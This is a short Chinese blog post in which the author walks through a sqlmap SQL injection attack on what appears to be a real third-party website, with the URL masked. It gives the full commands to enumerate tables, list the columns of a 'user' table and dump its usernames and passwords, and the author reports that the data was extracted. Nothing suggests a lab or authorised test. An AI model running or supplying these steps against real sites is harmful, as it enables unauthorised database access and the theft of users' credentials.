jason

自上次发安装篇的时候过了挺久的，忙其他事嘛

先看一下站点

注入点找好勒，不过我就是不发哈哈哈哈~

放入sqlmap扫描

检测的注入点是对的，那么接下来，也可以看到是MySQL的数据库，那么~~~

语句是：sqlmap.py -u "https://www.xxx.com/shownews.asp?id=23"  --tables

tebles是表名的意思

圆圈的内容是问你检测表的存在性

方框内容呢是让你设置线程，默认好像是10，也有人说是35什么的，反正我这最大是10

之后呢扫到了一个表名user

其实他还在继续扫，但我们只要得到我们要的内容就可以了，按ctrl+c停止即可

接下来继续扫我们的列名

语句是：sqlmap.py -u "https://www.xxx.com/shownews.asp?id=495"  -T "user" --columns

-T也就是--tables，“user”是我们扫到的表名，columns是列名的意思

方框内容和上面的一样就不说了，圆圈内容是扫到的内容，因为一般都是这两个里面的内容才是我们想要的，所以我们就暂停，开始提取最后一步了

语句是：sqlmap.py -u "https://www.xxx.com/shownews.asp?id=495" -T "user" -C "username,password" --dump

-C和上面-T一样，都是缩写，“username,password”是什么扫到的列名，--dump下载数据，扫描字段内容

内容粗来了，可以看到红字的内容，意思是url无法访问，所以内容是一卡一断

不过在Alice的电脑下扫却没有这个问题，这就很尴尬勒，好嘞，内容就到这啦，下一篇不知道何年哈哈

最后说一个技能哈：--后面的内容一般是全拼，-后面的是单词的首字母（大写）

例如：--tables

          -T